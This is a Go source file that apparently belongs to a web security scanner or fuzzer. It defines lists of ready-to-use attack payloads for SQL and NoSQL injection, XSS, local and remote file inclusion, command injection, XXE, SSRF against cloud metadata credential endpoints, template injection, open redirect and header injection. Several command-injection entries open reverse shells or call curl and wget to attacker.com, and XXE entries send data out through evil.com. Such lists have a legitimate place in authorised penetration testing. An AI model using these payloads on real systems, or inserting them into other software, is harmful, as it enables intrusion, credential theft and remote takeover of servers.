package payloads

var SQLiPayloads = []string{
	"'",
	"\"",
	"' OR '1'='1",
	"\" OR \"1\"=\"1",
	"' OR '1'='1'--",
	"' OR '1'='1'/*",
	"' OR '1'='1'#",
	"' OR 1=1--",
	"' OR 1=1#",
	"' OR 1=1/*",
	"') OR ('1'='1",
	"') OR ('1'='1'--",
	"') OR ('1'='1'#",
	"\") OR (\"1\"=\"1",
	"')) OR (('1'='1",
	"1' ORDER BY 1--",
	"1' ORDER BY 2--",
	"1' ORDER BY 3--",
	"1' ORDER BY 10--",
	"1' ORDER BY 100--",
	"1' UNION SELECT NULL--",
	"1' UNION SELECT NULL,NULL--",
	"1' UNION SELECT NULL,NULL,NULL--",
	"1' UNION SELECT 1,2,3--",
	"1' UNION ALL SELECT NULL--",
	"1' UNION ALL SELECT NULL,NULL--",
	"admin'--",
	"admin' #",
	"admin'/*",
	"admin' or '1'='1",
	"admin' or '1'='1'--",
	"admin' or '1'='1'#",
	"admin' or '1'='1'/*",
	"admin'or 1=1 or ''='",
	"admin') or ('1'='1",
	"admin') or ('1'='1'--",
	"' HAVING 1=1--",
	"' GROUP BY columnname HAVING 1=1--",
	"1; DROP TABLE users--",
	"1'; EXEC xp_cmdshell('dir')--",
	"'; WAITFOR DELAY '0:0:5'--",
	"'; WAITFOR DELAY '0:0:10'--",
	"1 AND 1=1",
	"1 AND 1=2",
	"1' AND '1'='1",
	"1' AND '1'='2",
	"1' AND SLEEP(5)--",
	"1' AND SLEEP(5)#",
	"1\" AND SLEEP(5)--",
	"1' AND BENCHMARK(10000000,SHA1('test'))--",
	"1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
	"1'; SELECT SLEEP(5);--",
	"'-'",
	"' '",
	"'&'",
	"'^'",
	"'*'",
	"' or ''-'",
	"' or '' '",
	"' or ''&'",
	"' or ''^'",
	"\"-\"",
	"\" \"",
	"\"&\"",
	"\"^\"",
	"or true--",
	"\" or true--",
	"' or true--",
	"\") or true--",
	"') or true--",
	"' or 'x'='x",
	"') or ('x')=('x",
	"\" or \"x\"=\"x",
	"\") or (\"x\")=(\"x",
	"or 1=1",
	"or 1=1--",
	"or 1=1#",
	"or 1=1/*",
	"1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
	"'||'",
	"'+'",
	"'%27",
	"''",
	"1 or 1=1",
	"1' or 1=1 or ''='",
	"' OR ''='",
	"' OR 'a'='a",
	"') OR ('a'='a",
	"1)) or ((1=1",
	"' OR username LIKE '%admin%",
	"' OR 1=1 LIMIT 1--",
	"1' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>64--",
	"1' AND (SELECT COUNT(*) FROM users)>0--",
	"1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--",
	"1' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version())),1)--",
	"-1' UNION SELECT 1,@@version,3--",
	"-1' UNION SELECT 1,database(),3--",
	"-1' UNION SELECT 1,user(),3--",
	"-1' UNION SELECT 1,table_name,3 FROM information_schema.tables--",
	"-1' UNION SELECT 1,column_name,3 FROM information_schema.columns--",
}

var XSSPayloads = []string{
	"<script>alert('XSS')</script>",
	"<script>alert(document.cookie)</script>",
	"<script>alert(document.domain)</script>",
	"<script>alert(1)</script>",
	"<script>confirm(1)</script>",
	"<script>prompt(1)</script>",
	"<script>eval('alert(1)')</script>",
	"<img src=x onerror=alert('XSS')>",
	"<img src=x onerror=alert(1)>",
	"<img/src=x onerror=alert(1)>",
	"<img src=x onerror=alert(document.cookie)>",
	"<svg onload=alert('XSS')>",
	"<svg/onload=alert(1)>",
	"<svg onload=alert(1)//",
	"<body onload=alert('XSS')>",
	"<body onpageshow=alert(1)>",
	"<iframe src=\"javascript:alert('XSS')\">",
	"<iframe srcdoc=\"<script>alert(1)</script>\">",
	"<input onfocus=alert('XSS') autofocus>",
	"<input type=image src=x onerror=alert(1)>",
	"<input onmouseover=alert(1)>",
	"<marquee onstart=alert('XSS')>",
	"<video><source onerror=alert('XSS')>",
	"<video src=x onerror=alert(1)>",
	"<audio src=x onerror=alert('XSS')>",
	"\"><script>alert('XSS')</script>",
	"'><script>alert('XSS')</script>",
	"</title><script>alert(1)</script>",
	"</style><script>alert(1)</script>",
	"</script><script>alert(1)</script>",
	"<script>alert(String.fromCharCode(88,83,83))</script>",
	"<IMG SRC=\"javascript:alert('XSS');\">",
	"<IMG SRC=javascript:alert('XSS')>",
	"<IMG SRC=JaVaScRiPt:alert('XSS')>",
	"<IMG SRC=`javascript:alert('XSS')`>",
	"<IMG SRC=\"jav	ascript:alert('XSS');\">",
	"<a href=\"javascript:alert('XSS')\">click</a>",
	"<a href=\"data:text/html,<script>alert(1)</script>\">click</a>",
	"<div style=\"background:url(javascript:alert('XSS'))\">",
	"<style>@import'javascript:alert(\"XSS\")';</style>",
	"{{constructor.constructor('alert(1)')()}}",
	"${alert('XSS')}",
	"<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>",
	"<details open ontoggle=alert(1)>",
	"<object data=\"javascript:alert(1)\">",
	"<embed src=\"javascript:alert(1)\">",
	"<form action=\"javascript:alert(1)\"><input type=submit>",
	"<math><maction actiontype=statusline#xss=alert(1)>click",
	"<isindex action=\"javascript:alert(1)\" type=image>",
	"<select autofocus onfocus=alert(1)>",
	"<textarea autofocus onfocus=alert(1)>",
	"<keygen autofocus onfocus=alert(1)>",
	"<button onfocus=alert(1) autofocus>",
	"<button onclick=alert(1)>click</button>",
	"<meter onmouseover=alert(1)>test</meter>",
	"<marquee behavior=alternate onstart=alert(1)>",
	"<animate onbegin=alert(1) attributeName=x>",
	"<xss onclick=alert(1)>click me</xss>",
	"<x onclick=alert(1)>click</x>",
	"'-alert(1)-'",
	"\"-alert(1)-\"",
	"</script><svg onload=alert(1)>",
	"<svg><script>alert&#40;1&#41;</script>",
	"<script>\\u0061lert(1)</script>",
	"<script>\\x61lert(1)</script>",
	"<svg><script>&#97;lert(1)</script>",
	"<script src=//evil.com/xss.js></script>",
	"<script src=data:,alert(1)></script>",
	"<base href=\"javascript:/a/-alert(1)//////\">",
	"<link rel=import href=data:text/html,<script>alert(1)</script>",
}

var LFIPayloads = []string{
	"../../../etc/passwd",
	"../../../../etc/passwd",
	"../../../../../etc/passwd",
	"../../../../../../etc/passwd",
	"../../../../../../../etc/passwd",
	"../../../../../../../../etc/passwd",
	"....//....//....//etc/passwd",
	"....//....//....//....//etc/passwd",
	"..\\..\\..\\etc\\passwd",
	"..\\..\\..\\..\\etc\\passwd",
	"/etc/passwd",
	"../../../../etc/passwd%00",
	"../../../etc/passwd%00.jpg",
	"../../../etc/passwd%00.png",
	"..%2F..%2F..%2Fetc%2Fpasswd",
	"..%252f..%252f..%252fetc%252fpasswd",
	"..%c0%af..%c0%af..%c0%afetc/passwd",
	"..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd",
	"/etc/passwd%00.jpg",
	"....//....//....//etc//passwd",
	"/proc/self/environ",
	"/proc/self/cmdline",
	"/proc/self/fd/0",
	"/proc/self/fd/1",
	"/proc/self/fd/2",
	"/proc/version",
	"/var/log/apache2/access.log",
	"/var/log/apache2/error.log",
	"/var/log/apache/access.log",
	"/var/log/apache/error.log",
	"/var/log/nginx/access.log",
	"/var/log/nginx/error.log",
	"/var/log/httpd/access_log",
	"/var/log/httpd/error_log",
	"/var/log/mail.log",
	"/var/log/auth.log",
	"/var/log/syslog",
	"/etc/shadow",
	"/etc/hosts",
	"/etc/hostname",
	"/etc/issue",
	"/etc/motd",
	"/etc/mysql/my.cnf",
	"/etc/httpd/conf/httpd.conf",
	"/etc/apache2/apache2.conf",
	"/etc/nginx/nginx.conf",
	"/etc/php.ini",
	"/usr/local/etc/php.ini",
	"/etc/ssh/sshd_config",
	"/root/.ssh/id_rsa",
	"/root/.ssh/authorized_keys",
	"/root/.bash_history",
	"/home/www/.bash_history",
	"C:\\Windows\\System32\\drivers\\etc\\hosts",
	"C:\\Windows\\win.ini",
	"C:\\boot.ini",
	"C:\\Windows\\System32\\config\\SAM",
	"C:\\Windows\\System32\\config\\SYSTEM",
	"C:\\Windows\\repair\\SAM",
	"C:\\Windows\\repair\\SYSTEM",
	"C:\\inetpub\\wwwroot\\web.config",
	"C:\\xampp\\apache\\logs\\access.log",
	"C:\\xampp\\apache\\logs\\error.log",
	"php://filter/convert.base64-encode/resource=index.php",
	"php://filter/convert.base64-encode/resource=config.php",
	"php://filter/convert.base64-encode/resource=../config.php",
	"php://filter/read=string.rot13/resource=index.php",
	"php://input",
	"php://stdin",
	"php://fd/0",
	"data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=",
	"data://text/plain,<?php system($_GET['cmd']);?>",
	"expect://id",
	"expect://whoami",
	"file:///etc/passwd",
	"file:///c:/windows/win.ini",
	"phar://test.phar/test.txt",
	"zip://test.zip#test.txt",
	"..././..././..././etc/passwd",
	"..;/..;/..;/etc/passwd",
}

var RFIPayloads = []string{
	"http://evil.com/shell.txt",
	"http://evil.com/shell.txt%00",
	"https://evil.com/shell.php",
	"//evil.com/shell.txt",
	"\\\\evil.com\\shell.txt",
	"http://evil.com/shell.txt?",
	"http://evil.com/shell.txt%00.jpg",
	"http://evil.com/shell.php%00",
	"https://evil.com/shell.txt",
	"ftp://evil.com/shell.txt",
	"http://evil.com/shell.txt%23",
	"data://text/plain;base64,PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7Pz4=",
	"php://filter/convert.base64-decode/resource=data://text/plain;base64,PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7Pz4=",
}

var CommandInjectionPayloads = []string{
	"; id",
	"| id",
	"|| id",
	"& id",
	"&& id",
	"`id`",
	"$(id)",
	"; ls -la",
	"| ls -la",
	"|| ls -la",
	"& ls -la",
	"&& ls -la",
	"; cat /etc/passwd",
	"| cat /etc/passwd",
	"&& cat /etc/passwd",
	"; whoami",
	"| whoami",
	"& whoami",
	"&& whoami",
	"`whoami`",
	"$(whoami)",
	"$(`whoami`)",
	"; uname -a",
	"| uname -a",
	"&& uname -a",
	"; ping -c 5 127.0.0.1",
	"| ping -c 5 127.0.0.1",
	"; sleep 5",
	"| sleep 5",
	"& sleep 5",
	"&& sleep 5",
	"$(sleep 5)",
	"`sleep 5`",
	"; sleep 10",
	"| sleep 10",
	"; nc -e /bin/sh attacker.com 4444",
	"| nc -e /bin/sh attacker.com 4444",
	"; bash -i >& /dev/tcp/attacker.com/4444 0>&1",
	"; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"attacker.com\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
	"; dir",
	"| dir",
	"& dir",
	"&& dir",
	"| type C:\\Windows\\win.ini",
	"& type C:\\Windows\\win.ini",
	"; type C:\\Windows\\win.ini",
	"; net user",
	"| net user",
	"& net user",
	"`net user`",
	"$(net user)",
	"; ipconfig",
	"| ipconfig",
	"& ipconfig",
	"; systeminfo",
	"| systeminfo",
	"; env",
	"| env",
	"&& env",
	"; set",
	"| set",
	"& set",
	"; printenv",
	"| printenv",
	"; curl http://attacker.com/",
	"| curl http://attacker.com/",
	"; wget http://attacker.com/",
	"| wget http://attacker.com/",
	";{id}",
	"|{id}",
	"${{id}}",
	"a]@127.0.0.1%0d%0aid",
	"\nid\n",
	"\n`id`\n",
	"\\nid\\n",
	"%0aid",
	"%0d%0aid",
	"a]@127.0.0.1;id",
}

var XXEPayloads = []string{
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><foo>&xxe;</foo>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://evil.com/xxe">]><foo>&xxe;</foo>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://evil.com/xxe.dtd">%xxe;]><foo></foo>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xxe;</foo>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><foo>&xxe;</foo>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///proc/self/environ">]><foo>&xxe;</foo>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><foo>&xxe;</foo>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]><foo>&xxe;</foo>`,
	`<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://evil.com/xxe.dtd"><foo>&xxe;</foo>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % dtd SYSTEM "http://evil.com/xxe.dtd">%dtd;]><foo>&send;</foo>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://evil.com/xxe.dtd">%xxe;%param1;]><foo>&exfil;</foo>`,
	`<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xxe;</foo>`,
	`<?xml version="1.0"?><!DOCTYPE data [<!ENTITY % remote SYSTEM "http://evil.com/xxe.dtd">%remote;%int;%trick;]><data>4</data>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://evil.com/xxe.php">]><foo><result>&ac;</result></foo>`,
	`<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://evil.com/xxe.dtd">%dtd;%all;]>]]>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "netdoc:///etc/passwd">]><foo>&xxe;</foo>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:http://evil.com/test.jar!/test.txt">]><foo>&xxe;</foo>`,
	`<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "gopher://evil.com:70/_test">]><foo>&xxe;</foo>`,
}

var SSRFPayloads = []string{
	"http://127.0.0.1",
	"http://localhost",
	"http://127.0.0.1:22",
	"http://127.0.0.1:3306",
	"http://127.0.0.1:6379",
	"http://127.0.0.1:27017",
	"http://127.0.0.1:5432",
	"http://127.0.0.1:11211",
	"http://127.0.0.1:9200",
	"http://127.0.0.1:9000",
	"http://127.0.0.1:8080",
	"http://127.0.0.1:8443",
	"http://127.0.0.1:8000",
	"http://127.0.0.1:3000",
	"http://127.0.0.1:5000",
	"http://169.254.169.254/latest/meta-data/",
	"http://169.254.169.254/latest/meta-data/iam/security-credentials/",
	"http://169.254.169.254/latest/user-data/",
	"http://169.254.169.254/latest/meta-data/hostname",
	"http://169.254.169.254/latest/meta-data/public-keys/",
	"http://metadata.google.internal/computeMetadata/v1/",
	"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
	"http://metadata.google.internal/computeMetadata/v1/project/project-id",
	"http://169.254.169.254/metadata/v1/",
	"http://169.254.169.254/metadata/v1/maintenance",
	"http://169.254.169.254/opc/v1/instance/",
	"http://169.254.169.254/openstack/latest/meta_data.json",
	"http://100.100.100.200/latest/meta-data/",
	"http://192.0.0.192/latest/",
	"file:///etc/passwd",
	"file:///etc/shadow",
	"file:///etc/hosts",
	"file:///proc/self/environ",
	"file:///proc/self/cmdline",
	"file:///c:/windows/win.ini",
	"dict://127.0.0.1:6379/INFO",
	"dict://127.0.0.1:11211/stats",
	"gopher://127.0.0.1:6379/_INFO%0D%0AQUIT%0D%0A",
	"gopher://127.0.0.1:9000/_test",
	"gopher://127.0.0.1:25/_HELO%20localhost",
	"http://[::]:80/",
	"http://0.0.0.0:80/",
	"http://0177.0.0.1/",
	"http://0x7f.0x0.0x0.0x1/",
	"http://2130706433/",
	"http://017700000001/",
	"http://0x7f000001/",
	"http://127.1/",
	"http://127.0.1/",
	"http://0/",
	"http://localhost.localdomain/",
	"http://127.127.127.127/",
	"http://[0:0:0:0:0:ffff:127.0.0.1]/",
	"http://①②⑦.⓪.⓪.①/",
	"http://localtest.me/",
	"http://customer1.app.localhost.my.company.127.0.0.1.nip.io/",
	"http://spoofed.burpcollaborator.net/",
	"http://internal.service/",
	"http://kubernetes.default.svc/",
	"http://kubernetes.default/",
	"http://consul.service.consul:8500/",
	"ldap://127.0.0.1/",
	"sftp://evil.com:1337/",
	"tftp://evil.com:69/test",
}

var SSTIPayloads = []string{
	"{{7*7}}",
	"${7*7}",
	"<%= 7*7 %>",
	"#{7*7}",
	"*{7*7}",
	"@(7*7)",
	"{{7*'7'}}",
	"${{7*7}}",
	"#{7*7}",
	"{{config}}",
	"{{config.items()}}",
	"{{settings.SECRET_KEY}}",
	"{{self}}",
	"{{self.__class__}}",
	"{{self.__class__.__mro__}}",
	"{{self.__class__.__mro__[2].__subclasses__()}}",
	"{{''.__class__.__mro__[2].__subclasses__()}}",
	"{{''.__class__.__bases__[0].__subclasses__()}}",
	"{{().__class__.__bases__[0].__subclasses__()}}",
	"{{''.__class__.__mro__[1].__subclasses__()}}",
	"{{request}}",
	"{{request.environ}}",
	"{{request.application.__globals__}}",
	"{{request.application.__globals__.__builtins__}}",
	"{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
	"{{request.application.__globals__.__builtins__.__import__('os').system('id')}}",
	"{{cycler.__init__.__globals__.os.popen('id').read()}}",
	"{{joiner.__init__.__globals__.os.popen('id').read()}}",
	"{{namespace.__init__.__globals__.os.popen('id').read()}}",
	"{{lipsum.__globals__.os.popen('id').read()}}",
	"{{lipsum.__globals__['os'].popen('id').read()}}",
	"${T(java.lang.Runtime).getRuntime().exec('id')}",
	"${T(java.lang.System).getenv()}",
	"${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}",
	"*{T(java.lang.Runtime).getRuntime().exec('id')}",
	"#{T(java.lang.Runtime).getRuntime().exec('id')}",
	"<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"id\") }",
	"[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}",
	"{{_self.env.registerUndefinedFilterCallback(\"exec\")}}{{_self.env.getFilter(\"id\")}}",
	"{{_self.env.registerUndefinedFilterCallback(\"system\")}}{{_self.env.getFilter(\"id\")}}",
	"{{['id']|filter('system')}}",
	"{{['cat /etc/passwd']|filter('system')}}",
	"{{app.request.server.all|join(',')}}",
	"<%= system('id') %>",
	"<%= `id` %>",
	"<%= IO.popen('id').readlines() %>",
	"<%= File.open('/etc/passwd').read %>",
	"${\"freemarker.template.utility.Execute\"?new()(\"id\")}",
	"{{constructor.constructor('return this.process.mainModule.require(\"child_process\").execSync(\"id\")')()}}",
	"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('id')\")()}}",
	"{{this.constructor.constructor('return this.process.mainModule.require(\"child_process\").execSync(\"id\")')()}}",
	"$eval.constructor('return process.env')()",
	"a]{{7*7}}",
	"a]${7*7}",
	"a]<%= 7*7 %>",
}

var OpenRedirectPayloads = []string{
	"//evil.com",
	"https://evil.com",
	"//evil.com/%2f..",
	"/\\evil.com",
	"/.evil.com",
	"///evil.com",
	"////evil.com",
	"https:evil.com",
	"http:evil.com",
	"//evil%E3%80%82com",
	"////evil.com/%2f%2e%2e",
	"https://evil.com/..;/",
	"/\\/evil.com",
	"//google%00.com",
	"//%0d%0aevil.com",
	"/%5cevil.com",
	"/evil.com",
	"/%2f%2fevil.com",
	"/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/",
	"//evil.com/..%2f..%2f",
	"\\evil.com",
	"\\\\evil.com",
	"//evil。com",
	"//evil%E3%80%82com",
	"/%09/evil.com",
	"/%09/evil.com",
	"http://evil.com%2f%2f.evil.com",
	"//evil.com@good.com",
	"//good.com.evil.com",
	"http://good.com%40evil.com",
	"http://evil.com%23.good.com",
	"http://evil.com%3f.good.com",
	"http://good.com#.evil.com",
	"http://good.com?.evil.com",
	"//1.1.1.1 &@2.2.2.2# @3.3.3.3/",
	"〱evil.com",
	"〵evil.com",
	"ゝevil.com",
	"ーevil.com",
	"ｰevil.com",
	"/http://evil.com",
	"https://evil.com/https://good.com",
	"//evil.com\\@good.com",
	"https:good.com/https:evil.com",
	"////evil.com/good.com",
	"java%0d%0ascript:alert(0)",
}

var NoSQLiPayloads = []string{
	`{"$gt": ""}`,
	`{"$ne": null}`,
	`{"$ne": ""}`,
	`{"$regex": ".*"}`,
	`{"$where": "1==1"}`,
	`true, $where: '1 == 1'`,
	`', $where: '1 == 1'`,
	`1, $where: '1 == 1'`,
	`{ $where: "sleep(5000)" }`,
	`{"$or": [{"a": 1}, {"b": 2}]}`,
	`admin' && this.password.match(/.*/)//`,
	`{"username": {"$gt": ""}, "password": {"$gt": ""}}`,
	`{"$gt": undefined}`,
	`{"$not": {"$ne": ""}}`,
	`{"$nor": [{"username": ""}]}`,
	`{"$in": ["admin", "Administrator"]}`,
	`{"$nin": ["invalid"]}`,
	`{"$exists": true}`,
	`{"$type": "string"}`,
	`{"$regex": "^admin"}`,
	`{"$regex": ".*", "$options": "si"}`,
	`{"$where": "this.username == 'admin'"}`,
	`{"$where": "function() { return true; }"}`,
	`{"$where": "this.password.match(/^a/)"}`,
	`{"$where": "sleep(5000) || 1==1"}`,
	`{"$or": [{"username": "admin"}, {"username": "root"}]}`,
	`{"$and": [{"$gt": ""}, {"$ne": ""}]}`,
	`{username: {$eq: "admin"}}`,
	`{password: {$regex: "^.{0,}$"}}`,
	`' || '1'=='1`,
	`|| 1==1`,
	`' || 1==1//`,
	`' || 1==1%00`,
	`admin'||'1'=='1`,
	`{$func: "var_dump"}`,
	`{$func: "sleep(5)"}`,
	`{mapReduce: 1, map: function() { return 1; }, reduce: function() { return 1; }}`,
	`{"$expr": {"$eq": [1, 1]}}`,
}

var HeaderInjectionPayloads = []string{
	"test\r\nX-Injected: header",
	"test%0d%0aX-Injected:%20header",
	"test\r\nSet-Cookie: session=hacked",
	"test%0d%0aSet-Cookie:%20session=hacked",
	"test\r\n\r\n<script>alert('XSS')</script>",
	"test%0d%0a%0d%0a<script>alert('XSS')</script>",
	"test\nX-Injected: header",
	"test%0aX-Injected:%20header",
	"test\rX-Injected: header",
	"test%0dX-Injected:%20header",
	"test%E5%98%8A%E5%98%8DX-Injected:%20header",
	"test\r\nLocation: https://evil.com",
	"test%0d%0aLocation:%20https://evil.com",
	"test\r\nContent-Length: 0\r\n\r\nHTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>hacked</html>",
	"test%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a",
	"test\r\nX-XSS-Protection: 0",
	"test\r\nAccess-Control-Allow-Origin: *",
	"test%0d%0aAccess-Control-Allow-Origin:%20*",
	"test\r\nTransfer-Encoding: chunked",
	"test\r\n\r\n",
	"test\u0085X-Injected: header",
	"test\u2028X-Injected: header",
	"test\u2029X-Injected: header",
}

func GetPayloadsByType(payloadType string) []string {
	switch payloadType {
	case "sqli":
		return SQLiPayloads
	case "xss":
		return XSSPayloads
	case "lfi":
		return LFIPayloads
	case "rfi":
		return RFIPayloads
	case "cmdi":
		return CommandInjectionPayloads
	case "xxe":
		return XXEPayloads
	case "ssrf":
		return SSRFPayloads
	case "ssti":
		return SSTIPayloads
	case "redirect":
		return OpenRedirectPayloads
	case "nosqli":
		return NoSQLiPayloads
	case "header":
		return HeaderInjectionPayloads
	case "all":
		var all []string
		all = append(all, SQLiPayloads...)
		all = append(all, XSSPayloads...)
		all = append(all, LFIPayloads...)
		all = append(all, CommandInjectionPayloads...)
		return all
	default:
		return nil
	}
}

func GetAvailablePayloadTypes() []string {
	return []string{
		"sqli", "xss", "lfi", "rfi", "cmdi",
		"xxe", "ssrf", "ssti", "redirect", "nosqli", "header", "all",
	}
}
